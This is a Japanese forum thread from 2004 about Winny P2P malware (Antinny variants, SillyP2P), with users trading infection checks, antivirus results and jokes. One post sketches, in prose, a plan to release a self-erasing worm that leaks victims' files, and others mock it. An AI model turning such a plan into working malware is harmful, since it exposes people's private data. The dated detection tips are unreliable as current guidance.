regedit.exeを開くとメモ帳になるか試した。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
を確認。(怪しいのはないと思う。)
UPフォルダの中身に不審なファイルがあるかチェック。
win.iniの「ぬるぽ」文字列があるか確認。
"C:\Documents and Settings\ユーザー名\Local Settings\Temp" に"ユーザー名.txt"があるか確認。
Upfolder.txtに登録したことのないフォルダが登録されるか確認。
Windowsフォルダにsvchost.exeを作成されたか確認。

全部異常はなかったんだけど、他に何か確認方法ありませんか?
キャッシュが消えるのって「ぬるぽウイルス」だと思ったんだけど。
226[名無し]さん(bin+cue).rar:04/11/15 05:06:53 ID:PkHA/SXY
>>225
消えるキャッシュに共通性は?
Winnyは起動時に破損とみなしたキャッシュを消すがその可能性は?
HDDが寿命だったりするとファイルが破損するが如何に?
脳豚オンラインスキャンの結果は?

とりあえず情報少な杉
227[名無し]さん(bin+cue).rar:04/11/15 05:55:21 ID:pWzQT5hE
>>224
どうぞ、新種や対応していない亜種などに感染していてください
228[名無し]さん(bin+cue).rar:04/11/15 06:06:18 ID:hy7wpxRA
>225
>2ヶ月弱、62メガバイトくらい。
OK!その容量なら感染してないよきっとw
229[名無し]さん(bin+cue).rar:04/11/15 06:51:01 ID:PkHA/SXY
>>227
おいおい、俺は>>211
> 分かった。キンタマを防ぐには、Winny.iniとUpFolder.txtを監視すればいいわけだ。
とか寝言曰ってるから、そんな手間掛ける事はねぇって主張してるだけだろ
誰も新種や未対応亜種もそれで桶とは書いてないだろがよ

頼むぜセニョール、ちゃんと読み取ってくれよw
230[名無し]さん(bin+cue).rar:04/11/15 08:03:59 ID:joH6ea2x
>>229

その新種や未知に対応するためにやろうとしていると思うのだが
ちゃんと読み取ってやれ

頼むぜセニョリータ
231[名無し]さん(bin+cue).rar:04/11/15 08:13:36 ID:wR6PwMqz
あのさ、ウイルス(アンティニー)発見して削除しようと
思って右クリックしたらパソコン落ちたんだけどやばいかな?(´Д`
232[名無し]さん(bin+cue).rar:04/11/15 08:19:40 ID:pWzQT5hE
>>231
( ´_ゝ`)フーン
233225:04/11/15 08:23:35 ID:EwrxQLic
>>226
共通性
キャッシュが2000個くらいあってもny起動すると、40個くらいになる。
大半は0バイトか1キロバイトのやつ。
192キロバイト以上のやつは120個くらいあったのは33個に減った。
と、これくらいしかわかりません。

HDDの寿命
具体的に消耗具合を知る方法は調べ切れなかったのですが
エラーチェックをしてみた所、特に問題はありませんでした。

破損キャッシュ
先頭10ブロックしか持っていない破損キャッシュはキーとキャッシュファイルを削除する
とあったので0、1キロバイトのものは、これに当たるのかと思います。

ノートンオンラインチェック
VBS.LoveLetter.Var というウイルスがテンポラリーインターネットファイルフォルダに
見つかったんですが、これは偽者っぽい気がします。

あまり情報を提示できず、申し訳ないです。
もう少し調べてみます。

>>228
上がり1キロ未満、下り4キロくらいなんであまり落ちないのです。
そんなもんかと思ってたんですが、該当スレを見ていると若干低いような気もします。
別にいいですけど。よくないけど。
234[名無し]さん(bin+cue).rar:04/11/15 08:38:37 ID:K5HBzk5V
>>233
回線56k?ISDN?







|-`).oO(2ヶ月で62MBって何落とそうとしてるんだろ・・・
235[名無し]さん(bin+cue).rar:04/11/15 09:12:37 ID:e2bxepvI
漏れの場合ny起動させると小さいサイズのキャッシュは勝手に消えるが?
236[名無し]さん(bin+cue).rar:04/11/15 10:04:09 ID:PkHA/SXY
>>230
「キンタマ」っつーのは「Antinny.G」だけだろ?
別のセニョール

新種や新亜種も含めるなら「キンタマ系」とか「Antinny系」って書いてくれよ


>>233
細かいヤツが消えてるのは仕様
Winny自体を正規の方法で落としていない場合は、
その時に破損してる可能性も有るんだが如何に?

変換の終わった完全キャッシュがザクザク消えてるのなら未対応亜種の可能性アリ
HDDが死にかけてるんだと思うけどね俺は
ま、現在の情報からって条件付きだけど
237[名無し]さん(bin+cue).rar:04/11/15 12:07:01 ID:TUflivdn
俺も今朝完全キャッシュがほぼ消えてた。
検索でひっかからない(エクスプローラ上からは見えるし、サイズもちゃんとしてる)
4日前にキャッシュ用のHDDが壊れて買い換えたばかりだから、
HDDの破損てことは無いと思う。

起動直後に一瞬だけひっかかるが、変換もできん
238[名無し]さん(bin+cue).rar:04/11/15 14:18:05 ID:OAcvuBMk
>>233
いやいや、キャッシュが2000個もあるわけ無いじゃん、62メガで
それ仮想キャッシュが接続切って引っかかってないだけでしょ
239[名無し]さん(bin+cue).rar:04/11/15 14:43:22 ID:l7WSbZV0
>>238
その通りだろうね。
62Mで2000個っていったら一個あたり31Kしかないわけで・・・
240[名無し]さん(bin+cue).rar:04/11/15 15:17:58 ID:PkHA/SXY
>>237
HDDの応答性能が悪くてWinnyの問い合わせでタイムアウトするとそんな感じ
低性能PC+USB2ボード+外付けHDDにキャッシュ置くと起きやすいらしいぞ


>>238-239
> 大半は0バイトか1キロバイトのやつ。
ってことだから大部分かすりキャッシュなんじゃね?
1KB以下なら2,000個あっても2MB以下だしな
241211:04/11/15 15:27:08 ID:ChtGOREs
>>236
言い方が悪かった。「新種の」という意味だ。

大体今更既存のキンタマ対策云々なんて言ってる
香具師はnyやるべきじゃないだろ。それくらい察してくれ。
242237:04/11/15 15:37:32 ID:TUflivdn
('A`) ごめん PCの時計いじってたんだった
キャッシュのタイムスタンプがおかしいから認識されないだけだった…

今は問題なしヾ(゚д゚)ノ゛あんまりタイムリーだったからつい
243[名無し]さん(bin+cue).rar:04/11/15 15:40:22 ID:PkHA/SXY
>>241
おお、最初のセニョール
字義通りに解釈したのは揚げ足取りの基本だから勘弁してくれ
だけど今更AやらGやらに感染してこのスレに来るボケナスが居るのも事実なんだ
その辺も察してもらえんだろうか?

やるべきじゃないってのは同意
むしろ回線切って(ryとさえ思っている
244[名無し]さん(bin+cue).rar:04/11/15 15:40:47 ID:OAcvuBMk
かすりキャッシュだとしたら2000個も落とそうとするなよって話だ
普通に考えても2000って数字はおかしいよ、200だとしてもまだおかしい
245[名無し]さん(bin+cue).rar:04/11/15 16:00:17 ID:yMMYdXIF
XPでぬるぽワーム駆除中なのですが、

WinXP の場合
 →C:\Documents and Settings\ (ユーザー名) \Local Settings\Temp

のLocal Settingsが見つかりません。隠れてたりするんでしょうか?
246[名無し]さん(bin+cue).rar:04/11/15 16:29:15 ID:Nx+PLqaO
>>245
フォルダオプション
247[名無し]さん(bin+cue).rar:04/11/15 16:34:46 ID:TM1MXLVY
>>245
ageんな厨房ウイルスまみれで野たれ氏ね
248[名無し]さん(bin+cue).rar:04/11/15 16:47:25 ID:yMMYdXIF
>>246
ありがとう。

>>247
すみません m(_ _)m
249[名無し]さん(bin+cue).rar:04/11/15 16:54:34 ID:cZHcljtj
酷すぎるな・・・・
250[名無し]さん(bin+cue).rar:04/11/15 16:55:51 ID:8uqxJik6
礼儀正しいなm(_ _)m
251[名無し]さん(bin+cue).rar:04/11/15 18:47:09 ID:NJ9MQd7f
>>241
と思うのだろうけど、こないだ「俺のデスクトップ」を無視条件から外したら、
いまだに感染している香具師がいて泣けた。
252233:04/11/15 18:50:47 ID:EwrxQLic
レスが遅れて申し訳ない。
キャッシュの大半は1キロバイト未満のものです。消えるのもそのキャッシュです。
これは正常のようですね。
100キロバイト以上のファイルだとその時は150個くらいだったと思うんですが
40個くらいに減っています。 これは破損しちゃったのかな。

nyを落とすって言うのはシャットダウンの事なら、接続したまま、PCの電源を切ってたので、その為に破損したのかもしれません。

回線はアパートのものでよくわからないんですが、光ファイバー(10M)とあります。NTTが関係あるものっぽいです。
推定最大スループット: 1.7Mbps
1320 Kbps 165.9 Kbyte/Sec
下り通信速度 264 Kbps
上り通信速度 107 Kbps
いくつかで通信速度を計ったら以上のように出ました。

完全キャッシュは全てではないでが、いくつか消えています。
変換したすぐに消えるか、いつまでも残るかの、二択に近いです。
完全キャッシュになるもの自体少ないですが。

薄く検索かけて、色々落ちて気に入ったのだけ変換する。って使い方を見たので、そういう風にしていたのですが
使い方に問題があったようですね。バッチリこのファイルって指定して落としたほうがいいのかな。

書くの忘れてましたが、HDDは2年半くらい前に買ったものです。
使い方にもよると思いますが、2ヶ月くらい前までは、OSの入ったメインで使っていて、今はny用です。

とりあえずウイルスでは無いんじゃないかと、思いました。
ボケナスが来てしまって申し訳ないです。
253[名無し]さん(bin+cue).rar:04/11/15 18:52:01 ID:RF2/Mu5f
  口―<<    ---→
日(_ _)日 キュラキュラ
254[名無し]さん(bin+cue).rar:04/11/15 20:15:50 ID:TM1MXLVY
随分速い光ファイバー(10M)ですね
255[名無し]さん(bin+cue).rar:04/11/15 21:24:16 ID:1lEC/HCf
「全戸CATVインターネット対応です!」なんて売り込みのマン
ションを良く聞いてみると、10Mケーブル1本を50戸にハブ分
岐してるだけってのも多いしな。

ひどいのになると、他の部屋の共有フォルダが丸見えとか(w。
256[名無し]さん(bin+cue).rar:04/11/15 22:52:41 ID:rOkkyLGM
他人の共有フォルダタンハァハァ/lァ/lァ/ヽァ/ヽァ ノ \ア ノ \ア / \ ア / \ ア
257[名無し]さん(bin+cue).rar:04/11/16 02:27:10 ID:VeSHpumm
ZIPファイルを解凍して、でてきたフォルダの名前にexeの文字がないことを確認して
そのフォルダを開くと、アンチウィルスソフトが反応してウィルスがどうたらこうたらって
表示がでて、その中ににexeファイルがある場合って、感染したんじゃなくて
アンチウィルスソフトがそのexeファイルに反応しただけですよね?
258[名無し]さん(bin+cue).rar:04/11/16 03:12:53 ID:pTKfch+v
その「どうたらこうたら」っていう表示に処理の内容が書いてあるんじゃないのか?
259[名無し]さん(bin+cue).rar:04/11/16 03:19:33 ID:qdX2cgvd
【晒し挙げ】 って書いてあるファイルが大量にあるんだが、既出?
260[名無し]さん(bin+cue).rar:04/11/16 03:26:17 ID:u2wsniLL
甚だ既出
261257:04/11/16 03:26:26 ID:VeSHpumm
ZIPファイルから解凍して、フォルダを開いてそのままウィルススキャンしたのと
ZIPファイルから解凍して、フォルダを開いてそれを消去してからウィルススキャンしたら
感染してないような結果になって安心しました。
これで安心して寝れる(^ヮ^)
262[名無し]さん(bin+cue).rar:04/11/16 03:31:49 ID:/wb4W6rM
そうだといいね。
263[名無し]さん(bin+cue).rar:04/11/16 03:51:09 ID:PxNl/97B
よくわかんねえけどだいじょぶなんじゃないの
264[名無し]さん(bin+cue).rar:04/11/16 03:55:21 ID:MAbf3h1H
カレー注文して、うんこカレーが出てきても、
口に入れてから確認するタイプなんだよ。きっと。
で、おかわりまでする人。
265[名無し]さん(bin+cue).rar:04/11/16 04:00:27 ID:LHBW8rot
nyでウィルス落とす確率とカレー屋でウンコ出てくる確率が違いすぎるので
例え話として相応しくない
266[名無し]さん(bin+cue).rar:04/11/16 04:24:33 ID:u2wsniLL
ウンコ屋でカレーが出てくる確率ならどないだ?
267[名無し]さん(bin+cue).rar:04/11/16 04:25:38 ID:DGMqNFbY
この例え話は確率の要素はそれほど重要ではない気もするが
268[名無し]さん(bin+cue).rar:04/11/16 04:48:45 ID:BkU9rzme
保持キャッシュが確実に減っているのだが
勝手に減る物なの?ウィルス検査してもでて来なかったんだけど
ダウンドライヴの空き容量も増えてるし(勝手に
もうダメポorz
269[名無し]さん(bin+cue).rar:04/11/16 05:20:55 ID:BkU9rzme
少し前のスレ読んでなかったほとんど同じ状態だったorz
270[名無し]さん(bin+cue).rar:04/11/16 09:18:43 ID:7aXNWQA+
C:にwinny(キャシュは別ドライブ)な僕は挑戦者でしょうか?
271[名無し]さん(bin+cue).rar:04/11/16 09:43:10 ID:etlOpwll
>>268
システム情報の「アップフォルダ個数」「アップファイル個数」
「アップファイルキー個数」はどうなってる?
数値がおかしいと思ったらフォルダ情報を見てくれ。なにかあるか?
272[名無し]さん(bin+cue).rar:04/11/16 09:44:01 ID:ibBp/FKC
>270
いいんじゃない?
なんかあったらOS再インスコでOKなんだし
273[名無し]さん(bin+cue).rar:04/11/16 10:53:31 ID:qNjeJhQQ
Nightfall.5815について詳細求む。
274[名無し]さん(bin+cue).rar:04/11/16 15:53:04 ID:q2anXjVv
>>272
そういう問題じゃない。
HDが痛むからやめといたほうがいい。
275[名無し]さん(bin+cue).rar:04/11/16 15:56:10 ID:DGMqNFbY
>>274
キャッシュは別ドライブ
キャッシュは別ドライブ
キャッシュは別ドライブ
キャッシュは別ドライブ
キャッシュは別ドライブ
キャッシュは別ドライブ
キャッシュは別ドライブ
キャッシュは別ドライブ
276[名無し]さん(bin+cue).rar:04/11/16 16:18:06 ID:q2anXjVv
ごめんなさい読み落としてました
ごめんなさい読み落としてました
ごめんなさい読み落としてました
ごめんなさい読み落としてました
ごめんなさい読み落としてました
ごめんなさい読み落としてました
ごめんなさい読み落としてました
ごめんなさい読み落としてました
277[名無し]さん(bin+cue).rar:04/11/16 16:38:23 ID:RvEoece1
俺、ディスクトップでnyと洒落つかってるよ、勿論キャッシュも
俺、ディスクトップでnyと洒落つかってるよ、勿論キャッシュも
俺、ディスクトップでnyと洒落つかってるよ、勿論キャッシュも
俺、ディスクトップでnyと洒落つかってるよ、勿論キャッシュも
俺、ディスクトップでnyと洒落つかってるよ、勿論キャッシュも
俺、ディスクトップでnyと洒落つかってるよ、勿論キャッシュも
俺、ディスクトップでnyと洒落つかってるよ、勿論キャッシュも
俺、ディスクトップでnyと洒落つかってるよ、勿論キャッシュも
278[名無し]さん(bin+cue).rar:04/11/16 16:41:02 ID:OPnaeqzK
ほうですか
頑張ってつかあさい
279[名無し]さん(bin+cue).rar:04/11/16 17:25:56 ID:Rc9XkXeV
マイドキュメントのDownloaded Filesフォルダの中にup3238.iniって言うのがあったんですけど
ウイルスですかね?
中身を見ると
280[名無し]さん(bin+cue).rar:04/11/16 17:27:48 ID:Rc9XkXeV
途中で押しちゃいました

中身を見るとRomaFile=C:\WINDOWS\デスクトップ\xx\xx\xx.txt
ってのがあったんだけど金玉かな?
281[名無し]さん(bin+cue).rar:04/11/16 17:34:24 ID:tgtiIfJF
関係ないんじゃないの。つか、ここは質問スレではありませんよ
282[名無し]さん(bin+cue).rar:04/11/16 17:41:25 ID:pj1gZZvo
でもスレタイに沿ったカキコ(いわゆる解析情報)がほとんどないのよね〜
283[名無し]さん(bin+cue).rar:04/11/16 18:14:21 ID:tgtiIfJF
いや、解析しようにも、面白げな新種って見つからないし
284273:04/11/16 19:09:48 ID:Gfp+G9G0
自己レス。
キャッシュ内で生息・活動するタイプもいるのか。
キャッシュ切ってすっきりしたよ(今のところ)。
いい勉強になった。
285[名無し]さん(bin+cue).rar:04/11/16 20:26:42 ID:I7M+PNIA
PC Japanにantinnyの検出力チェックのってたよね。
nortonはいいにしてもavastはおかしいと思う。

あと、既知のウイルスをわざわざリネームして流している人がいるような気がする。
アンチウイル入れてない人しか感染しないから意味ないのに…ただのひまつぶしなのかな?。
ちなみにmabutu.a、optix.pro.13をゲットしました。いずれもほとんどのオンラインスキャンで検出できた。
286[名無し]さん(bin+cue).rar:04/11/16 21:58:53 ID:tgtiIfJF
もちろん、nyネットワーク上には、数々のウイルス/トロイなどが流れているわけだが
nyを狙ったものというなら、初代Antinny(ぬるぽ)や、Antinny.G(キンタマ)
Antinny.KとかQとか、Upchan(苺キンタマ)だのSillyP2P(仙台キンタマ)だの
nyの機能に依存してないと…と思うわけだ。そういう意味で、今は先生らが未対応のブツ
は出回ってない。

ので、マターリ雑談スレ化するのは、仕方ない流れだろーと
287[名無し]さん(iso+mds).rar:04/11/16 22:07:46 ID:mAI7O90b
(・∀・)ニヤニヤ
288[名無し]さん(bin+cue).rar:04/11/16 22:10:09 ID:TnSk2PSv
>>286
苺キンタマはny依存とは違うと思ってたんだが…。
289[名無し]さん(bin+cue).rar:04/11/16 22:32:38 ID:pj1gZZvo
まぁ雑談もマターリしていていいのだが、それなら
質問に目くじら立てなくてもいいかなぁと思うんだが。
雑談よりはスレタイに近いし。
290[名無し]さん(bin+cue).rar:04/11/16 22:37:52 ID:q2anXjVv
あまりにも痛い質問じゃなければ普通にいいんじゃないの?
そんなの雑談の範囲内だと思うし。
291[名無し]さん(bin+cue).rar:04/11/16 22:38:25 ID:Lm5mVZ6d
ヒロシです・・・
nyで落とした圧縮ファイルの中にexeファイルがありましたが、
怖くてダブルクリックできません

ヒロシです・・・ ヒロシです・・・ ヒロシです・・・
292[名無し]さん(bin+cue).rar:04/11/16 22:39:57 ID:q2anXjVv
>>291
びっくりするくらい面白くない。
293[名無し]さん(bin+cue).rar:04/11/16 22:57:55 ID:4FEaBXz3
>>291
むしろ敵意を覚えるくらい面白くない。
294[名無し]さん(bin+cue).rar:04/11/16 23:04:20 ID:wX6D1asV
いいか、みんな
        (゚д゚ )
        (| y |)


          ( ゚д゚)
         (| y |)



         (゚д゚ )
         (| y |)
295[名無し]さん(bin+cue).rar:04/11/16 23:18:10 ID:eyyElnCq
        (゚д゚ )
        (| y |)


          ( ゚д゚)
         (| y |)



         (゚д゚ )
         (| y |)
296[名無し]さん(bin+cue).rar:04/11/16 23:19:58 ID:4FEaBXz3
        (゚д゚ ;)
        (| y |)


          (; ゚д゚)
         (| y |)



         (゚д゚ ;)
         (| y |)


297[名無し]さん(bin+cue).rar:04/11/16 23:20:46 ID:iK2JBp+G
キョロキョロすんな
298[名無し]さん(bin+cue).rar:04/11/16 23:24:41 ID:dJ0Y68Ri
    _  ∩
  ( ゚∀゚)彡 おっぱい!おっぱい!
  (  ⊂彡
   |   | 
   し ⌒J
299[名無し]さん(bin+cue).rar:04/11/16 23:24:58 ID:5e/1lYP+
この挙動不審が!
300[名無し]さん(bin+cue).rar:04/11/16 23:35:19 ID:UMyRVS1/
297のツッコミにワラタ。
301[名無し]さん(bin+cue).rar:04/11/17 07:18:25 ID:1bgscOZl
 いいか、みんな
        (゚д゚ )
        (| y |)


 珍しいものが2つ揃うと・・・
   珍.   ( ゚д゚)  珍
     \/| y |\/



     ヽ(゚д゚ )ノ
      (  )
      ノω|


 __[警]
  (  ) ('A`) 
  (  )Vノ )
   | |  | |




  こうなる
        (゚д゚ )
        (| y |)
302[名無し]さん(bin+cue).rar:04/11/17 12:44:46 ID:smm+coyW
ウィルスにかかったくさい(´・ω・`)
オートランでexe起動させられた(´・ω・`)
303[名無し]さん(bin+cue).rar:04/11/17 13:53:18 ID:9W3bNrd4
怪しげなファイルを落としてexeを実行した場合に
ウイルスに感染するというのはなんとなくわかるんだけど
他にどんなルートで感染するのか教えてくだはい。
304[名無し]さん(bin+cue).rar:04/11/17 14:00:50 ID:7nsQeY3T
305[名無し]さん(bin+cue).rar:04/11/17 14:05:36 ID:9W3bNrd4
オートランでつか?
検索して調べたけどもひとつわからんです。
exe実行しなくても、落としたファイルが勝手に実行しちゃうんでつかね?
306[名無し]さん(bin+cue).rar:04/11/17 14:06:50 ID:9W3bNrd4
動画とmp3しか落としてないから僕は関係ないかな。
307[名無し]さん(bin+cue).rar:04/11/17 14:24:38 ID:2fnkrRTl
話は変わるが

おまいらおなじみのエキサイト翻訳で「まじっすか」と日英訳してみろ
308[名無し]さん(bin+cue).rar:04/11/17 14:27:34 ID:u2csp+9a
まじっす
309[名無し]さん(bin+cue).rar:04/11/17 14:32:43 ID:6OWsCtgB
最近釣り師が多いな
310[名無し]さん(bin+cue).rar:04/11/17 14:37:06 ID:ok94Y06L
>>306
mp3の入ってるフォルダー偽装のエグゼファイルのやつがたまにあるから気をつけろよ。
311[名無し]さん(bin+cue).rar:04/11/17 14:43:58 ID:7nsQeY3T
オートラン停止と拡張子表示は、基本中の基本だと思う。
つか、テンプレ読んでないorわからないやつは、ここに来ても
意味が無い。初心者スレで精進してこないとな。
312[名無し]さん(bin+cue).rar:04/11/17 15:13:27 ID:u2csp+9a
zip.mp3を.zipに直して解凍するとウイルスはいってんのよく見るけど
313[名無し]さん(bin+cue).rar:04/11/17 15:17:31 ID:lHkDeDG2
二重拡張子なんて…
314[名無し]さん(bin+cue).rar:04/11/17 15:37:15 ID:t9aMOyzL
レベル低い香具師増えたね・・・
315[名無し]さん(bin+cue).rar:04/11/17 16:13:16 ID:FQUXAUDz
二重拡張子ってなんだ?
ただ、名前を変えただけだろ・・・
アルバムとかはZIPをMP3にして・・・・・
316[名無し]さん(bin+cue).rar:04/11/17 16:13:36 ID:FQUXAUDz
あ・・・
しまった・・・
釣られた・・
317[名無し]さん(bin+cue).rar:04/11/17 16:15:34 ID:t9aMOyzL
頼むよ、兄弟・・・
318[名無し]さん(bin+cue).rar:04/11/17 16:16:58 ID:GnwvhQq9
zip.mp3と.○○○.lzhを一緒に考えてる悪寒
319[名無し]さん(bin+cue).rar:04/11/17 16:31:08 ID:BZMfG1cB
まあ、拡張子がmp3とzipというように二重になっているので、正確には二重拡張子だな
320[名無し]さん(bin+cue).rar :04/11/17 16:52:21 ID:DufGptkU
バスターは仙台対応したの?
321[名無し]さん(bin+cue).rar:04/11/17 17:04:16 ID:V+LIkX7y
してません
322[名無し]さん(bin+cue).rar:04/11/17 17:20:06 ID:h514KyuO
してないのか・・・
323[名無し]さん(bin+cue).rar:04/11/17 19:39:13 ID:SQTyGbBq
UpFolder.txtはどこのフォルダに入っているのでしょうか??
Winnyフォルダ直下にはありませんでした。多分感染してると思うのですが…。
324[名無し]さん(bin+cue).rar:04/11/17 19:44:47 ID:GECPn/sz
m9(^Д^)プギャー
325[名無し]さん(bin+cue).rar:04/11/17 19:49:34 ID:kwJdM3k1
いまどきのやつは、ぐぐるどころかローカルディスク内検索すら
しないのかと。
326[名無し]さん(bin+cue).rar:04/11/17 20:04:08 ID:OMLZMAnO
保存場所はマイドキュメントしか知らないから
327[名無し]さん(bin+cue).rar:04/11/17 20:10:57 ID:GnwvhQq9
Ctrl+Fで検索できるんだぜと自慢げに解説してた奴みたことあるな('A`)
328[名無し]さん(bin+cue).rar:04/11/17 20:12:56 ID:M0Jbi87u
↑うぉおお!知らなかった!!
けどそれが何か?って感じだな
329[名無し]さん(bin+cue).rar:04/11/17 20:32:46 ID:+I2bT92U
キンタマ感染してた・・・orz
330[名無し]さん(bin+cue).rar:04/11/17 20:33:53 ID:5I42TayZ
痒いよ(ノ≧ロ)ノ<嫌嫌嫌嫌嫌嫌嫌嫌嫌
病院行って来るわw
331[名無し]さん(bin+cue).rar:04/11/17 20:46:02 ID:Z7sp4ZUa
ノードリスト消すウイルスっている?

今日見たら真っ白になってて焦った
入れ直したら直ったが
332[名無し]さん(bin+cue).rar:04/11/17 21:22:02 ID:7h4RrI1Q
>>331
そんなもん、nyが異常終了して更新失敗しただけ
ああ、ほんとに馬鹿が多いなぁ
333[名無し]さん(bin+cue).rar:04/11/17 22:05:45 ID:Fp9NThf/
パソコン使用者の意図に反して、ハードディスク内の
mp3ファイルやMPEGファイルなどを勝手にP2Pネットワ
ークに公開し、そしてランダム時間経過後に自立的に
自己をアンインストールした上で、ハードディスク上
のクラスタに痕跡が残らないようにOSのページングフ
ァイルなどで上書きするタイプの、強力なワームかコ
ンピュータウイルスを作って放流する
334[名無し]さん(bin+cue).rar:04/11/17 22:11:56 ID:7h4RrI1Q
OSのページングファイル、というか、HDDスワップなんか使わねー
知ったかぶりちゃんが出てくるなんて…なんてヌルイんだ!
335[名無し]さん(bin+cue).rar:04/11/17 22:31:56 ID:kwJdM3k1
まるで厨房が背伸びして書きなぐったような内容だな。
336[名無し]さん(bin+cue).rar:04/11/17 22:39:58 ID:toCt2E9t
寝てる間に大量に隔離されてた
ホントバスターは可愛いぜ フゥハハハー
337[名無し]さん(bin+cue).rar:04/11/17 23:09:47 ID:l9aXw8Kr
ニセ教祖というエロゲーにも仙台キンタマウィルスexeがあるという情報が
338[名無し]さん(bin+cue).rar:04/11/17 23:11:56 ID:rbQFy8fr
新種亜種じゃないんならもうどうでもいいだろ
339[名無し]さん(bin+cue).rar:04/11/17 23:36:07 ID:GECPn/sz
>>337
業者乙です。
もう旬は過ぎましたよ
340[名無し]さん(bin+cue).rar:04/11/18 08:00:44 ID:PTSWw5OS
mp3(^Д^)プギャー
341[名無し]さん(bin+cue).rar:04/11/18 08:02:27 ID:8cIGuf5C
morningm9(^Д^)プギャー
342[名無し]さん(bin+cue).rar:04/11/18 09:18:27 ID:wRTib3Vn
おい、お前ら聞いてくれよ
昨日、シマンテックのantivirus買ってきたんだがインスコしてアップデートして全体スキャンしたらW32.SillyP2Pが出てきたYO!
踏んでるかどうかは別として、今までシマンテックの無料オンラインスキャンで引っ掛からなかったのにどういうことかと
正製品のスキャンとオンラインスキャンを一緒に考えてた俺が甘かったのか?
343[名無し]さん(bin+cue).rar:04/11/18 11:01:37 ID:ZXO03BiP
わーい、仙台キンタマ感染者だ!
オンラインスキャンのデータベース更新は遅いからね
正規版の更新でも、対応したのごく最近(先週)だし
344[名無し]さん(bin+cue).rar:04/11/18 11:28:42 ID:RS7yOx5w
オマエは一生そうやって喜んでろアホw
345[名無し]さん(bin+cue).rar:04/11/18 11:34:10 ID:wRTib3Vn
オンラインスキャンのデータベース更新が遅いって本当なの?
同期で更新してるかと思ったが、違うのかよ、参るぜ
346[名無し]さん(bin+cue).rar:04/11/18 11:54:35 ID:Llu8Z7Se
たぶん圧縮ファイルが(ry
347[名無し]さん(bin+cue).rar:04/11/18 14:34:35 ID:ZXO03BiP
348[名無し]さん(bin+cue).rar:04/11/18 15:01:53 ID:oYIinTk4
ぶっちゃけそれ作ったやつがまっさきに捕まる
349[名無し]さん(bin+cue).rar:04/11/18 15:33:17 ID:RlXcJRDG
(・∀・)
350[名無し]さん(bin+cue).rar:04/11/18 18:47:34 ID:ZTbOnPFQ
>>343
W32.SillyP2Pは仙台キンタマ専用ではないと思うぞ
351[名無し]さん(bin+cue).rar:04/11/18 23:12:02 ID:IifZn5GU
仙台とかのAdministratorとかの場所がリモホだったら
パパとか学校、企業のPCでnyやってる奴とかガクガクだろうなぁ。
身内のだと簡単にプロバイダ変えられないし企業や学校だと内部からも何らかの処分あるかもしれんし。
352[名無し]さん(bin+cue).rar:04/11/18 23:13:31 ID:I6d2fPmh
意味不明。
353[名無し]さん(bin+cue).rar:04/11/18 23:49:30 ID:5htIXpFl
理解した。
354[名無し]さん(bin+cue).rar:04/11/19 01:46:54 ID:e6Fakv+8
うむ。
よい文だ
355[名無し]さん(bin+cue).rar:04/11/19 02:32:55 ID:CX2ypdLF
リモホ晒すのなら時間も正確にね
どうせならSSと合成してほしいもんだね
356[名無し]さん(bin+cue).rar:04/11/19 13:45:56 ID:ydu8ToVx
SCRが付けるファイル名は、既存のファイル名から拾ってるっぽいぞ。
357倍率ドン ◆spuCn5wBDM :04/11/19 14:53:11 ID:GX1pkCNl
セキョンの、ダイズクービー!
358[名無し]さん(bin+cue).rar:04/11/19 14:57:34 ID:uKH7w7GM
新しいウイルスまーだー?
359倍率ドン ◆spuCn5wBDM :04/11/19 15:08:24 ID:GX1pkCNl
セキョンの、ダイズクービー!
360[名無し]さん(bin+cue).rar:04/11/19 21:36:50 ID:0HokJ5HF
【使用OS】 ME
【WindowsUpdateしてるか】 YES
【AntiVirusは】 持ってない
【ちゃんとUpdateしてるか】 NO
【スキャンした結果】 できない。
【オンラインスキャンしたならその結果は】 Antinnyの亜種らしきウィルスがいくつか検出された
【Winnyのバージョン】 2.71
【Winny歴、総DL量は】 3日 3GBぐらい
【テンプレを読んだか】 Yes
【テンプレにある対策を実行したか】 Yes
【症状か具体的に、分かる限りすべて書く】 特に何も起きていないのだが、ウィルスが入っているので心配。
【これまでにとった措置】 spybot等を使って、スパイウェアを駆除した。
テンプレのサイトにしたがって、ウィルスの駆除を行おうとした(特に何も見つからなかった)。

Upファイルが勝手にできたり、変なスクリーンセーバーが起動したりすることは無いのですが、
winnyを起動すると「UPフォルダの取得に失敗」と表示されます。
やはり一度Winnyを削除したほうがいいのでしょうか?
それともこのまま放置して、人柱になるべきですか?
361[名無し]さん(bin+cue).rar:04/11/19 21:39:04 ID:wUczXiNl
>>360
バージョン2.71の仕様です
別に感染もしてませんよ
362[名無し]さん(bin+cue).rar:04/11/19 21:50:20 ID:0HokJ5HF
>>361
即レスありがとうございます。良かった…。
まあ殺風景なデスクトップなんで、別にスクショ撮られても構わないんですけどね。
363[名無し]さん(bin+cue).rar:04/11/19 22:41:54 ID:y7SVPsyK
>>360
【AntiVirusは】 持ってない

自信が無くてココに聞きに来るくらいなら、入れときなさいって・・・
364[名無し]さん(bin+cue).rar:04/11/19 23:08:35 ID:4MS0ppqe
>>362
キンタマに感染してる可能性は低いつーかおそらくないけど
いらんウィルス抱えてビクビク暮らすくらいなら
>>363の言うようにアンチウィルスソフト入れとけ
過信は禁物だけどな
365[名無し]さん(bin+cue).rar:04/11/19 23:26:52 ID:Ztx3QDkK
オンラインスキャンで検出されてるのは?
らしきってのがよくわからんが
どうせなら検出結果を書けばいいのに
366[名無し]さん(bin+cue).rar:04/11/20 00:11:11 ID:m/samulk
(´-`).。oO(スクショだけですまない奴かも知れないけどな・・・)
367[名無し]さん(bin+cue).rar:04/11/20 01:37:29 ID:XPTC77i7
スクショ=スク水+ショタ
のイメージが頭の中に広がってしまったので逝ってきます....
人柱になるなら、PC名をそれなりにしてくださいね
368360:04/11/20 01:51:49 ID:wU7I1QlC
なんか皆さん優しすぎて怖いんですけど。
スキャンされたウィルスはWORM_ANTINNY.Aです。(トレンドマイクロ社のオンラインスキャンを利用しました)
C:¥RESTORE…という場所にあるようなのですが(きちんと最後まで表示してくれない)、
そんなファイルはありませんし、削除可能の覧にも「いいえ」と表示されています。
ちなみにレジストリエディタを起動して
「ara-key= <ワームのファイルの場所> -StartUp」が無いか探しましたが見つかりませんでした。
とりあえず明日、ノートン先生を買ってこようと思います。

>>360
Program filesにあるファイルが起動毎に毎回コピーされるようなので、
とりあえず容量に目を光らせておこうかと思っています。
これまでのところ、コピーされた様子はないのですが。
369[名無し]さん(bin+cue).rar:04/11/20 01:52:13 ID:wU7I1QlC
